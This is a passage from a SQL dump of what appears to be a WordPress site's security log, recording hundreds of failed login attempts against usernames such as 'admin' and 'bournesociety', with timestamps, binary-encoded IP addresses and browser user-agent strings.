Firefox/62.0'),(4813,8003,1629361517.374173,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���MW','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(4814,8004,1629361585.899753,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����{�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4815,8005,1629361735.983034,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36'),(4816,8006,1629361837.616859,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4817,8007,1629362106.421176,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��u,�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4818,8008,1629362276.461706,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(4819,8009,1629362363.797923,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4820,8009,1629362363.887873,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4821,8010,1629362625.676953,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G�a','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4822,8014,1629363697.698673,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4823,8015,1629363800.275008,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��)�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4824,8016,1629363813.814722,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Vҳ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(4825,8017,1629363971.080369,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4826,8018,1629364242.963422,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QDD�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4827,8019,1629364501.077658,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�5?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4828,8020,1629364595.830038,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"DL ','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(4829,8021,1629364782.855564,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4830,8022,1629365066.057248,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^+.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4831,8024,1629365610.241201,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���`J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4832,8025,1629365883.463517,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ge�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4833,8026,1629365953.040833,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���,��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4834,8027,1629366172.482166,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��:��^','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(4835,8028,1629366192.413962,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VK�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4836,8031,1629367630.646558,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��=�F�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4837,8032,1629367870.980443,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/`��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(4838,8033,1629367917.119203,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g1?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4839,8034,1629368042.811181,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����8]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4840,8036,1629368502.452774,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4841,8037,1629368728.482594,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�=�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(4842,8038,1629368764.160892,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4843,8039,1629369058.401529,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��*��U','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4844,8040,1629369381.243887,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gk�s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4845,8042,1629369675.767207,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g/<,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4846,8043,1629369971.646864,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4847,8044,1629370261.050770,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����I','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4848,8052,1629377278.535086,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�N','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0'),(4849,8056,1629386031.642937,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��U��&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4850,8060,1629391014.841259,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(4851,8061,1629392381.274141,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��?��','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53'),(4852,8064,1629394112.846779,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4853,8065,1629394113.216315,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4854,8066,1629394113.979764,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4855,8067,1629394115.159015,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4856,8068,1629394115.669975,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4857,8069,1629394116.025872,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4858,8070,1629394116.616188,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4859,8071,1629394117.016299,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4860,8072,1629394117.629341,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4861,8072,1629394117.688521,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4862,8073,1629394118.273344,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4863,8074,1629394118.725685,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4864,8075,1629394119.141358,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4865,8075,1629394119.149195,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4866,8076,1629394119.583731,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4867,8076,1629394119.625104,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4868,8077,1629394120.346268,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4869,8078,1629394120.736621,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4870,8079,1629394121.287955,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4871,8081,1629394914.374520,1,'loginFailInvalidUsername','org',0,'\0\0\0\0\0\0\0\0\0\0��*p&U','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4872,8086,1629401471.748520,1,'loginFailInvalidUsername','org',0,'\0\0\0\0\0\0\0\0\0\0��R@�x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4873,8087,1629403614.792348,1,'loginFailInvalidUsername','org',0,'\0\0\0\0\0\0\0\0\0\0��Kw��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4874,8088,1629404804.613857,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@sP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4875,8089,1629405227.145608,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��˖kM','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4876,8092,1629406633.332160,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4877,8093,1629407189.084169,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���kb','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4878,8094,1629407731.146728,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��j)�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4879,8095,1629407873.248837,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��)�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4880,8096,1629408296.130150,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�q�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4881,8098,1629409333.820538,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(4882,8102,1629410384.503521,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��?���','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4'),(4883,8103,1629410651.251066,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4884,8105,1629411697.684806,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0����9d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4885,8106,1629411953.985914,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�.4','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4'),(4886,8107,1629411959.527569,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4887,8111,1629413895.406941,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���b','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4888,8113,1629415226.244729,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���˰R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4889,8114,1629415888.297309,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4890,8117,1629417241.081113,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-@6�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4891,8130,1629418634.571309,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4892,8132,1629420056.541289,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m�\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4893,8134,1629421535.304070,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����-�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4894,8136,1629422717.136688,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���:�3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4895,8137,1629423017.553591,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4896,8139,1629424536.978470,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4897,8141,1629425310.175861,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gk�s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4898,8143,1629426845.751485,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����i�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4899,8145,1629428444.603760,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4900,8146,1629429247.837530,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���,�7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4901,8147,1629429390.340188,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��|�<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4902,8148,1629430037.527127,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4903,8149,1629430447.061075,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�;�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(4904,8150,1629430840.583938,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4905,8151,1629431647.864915,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���l��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4906,8152,1629431710.291935,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��\r��.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4907,8153,1629432159.265605,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��?���','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(4908,8153,1629432159.349061,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��?���','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(4909,8155,1629434058.144331,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0�����g','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4910,8156,1629434097.655524,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ғ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4911,8158,1629435606.953053,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��2tb','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4912,8159,1629436118.515665,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4913,8160,1629436314.169119,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4914,8162,1629436894.945823,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4915,8163,1629437299.298234,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ՈLB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4916,8164,1629437673.490570,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h%��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4917,8165,1629438031.100593,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��o���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4918,8166,1629438404.094573,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���֗�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4919,8167,1629438556.422910,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��h*K4','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4920,8168,1629439155.760441,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4921,8169,1629439565.351254,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����dl','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4922,8170,1629439931.572714,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ww','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4923,8171,1629440294.437938,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4924,8172,1629440497.915101,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��Ǩf�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(4925,8173,1629440669.222341,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@rP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4926,8174,1629441014.990378,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��g⋙','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4927,8174,1629441015.029813,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��g⋙','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4928,8175,1629441061.052313,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gx��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4929,8176,1629441424.927728,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A�O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4930,8177,1629442622.214536,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4931,8178,1629442893.238896,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��E�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(4932,8179,1629442963.623322,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���֖]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4933,8182,1629443327.627734,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@v7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4934,8183,1629443493.218368,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4935,8184,1629443697.444781,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�.�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(4936,8185,1629443713.366498,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qod','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4937,8186,1629444070.845798,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��D�\n9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 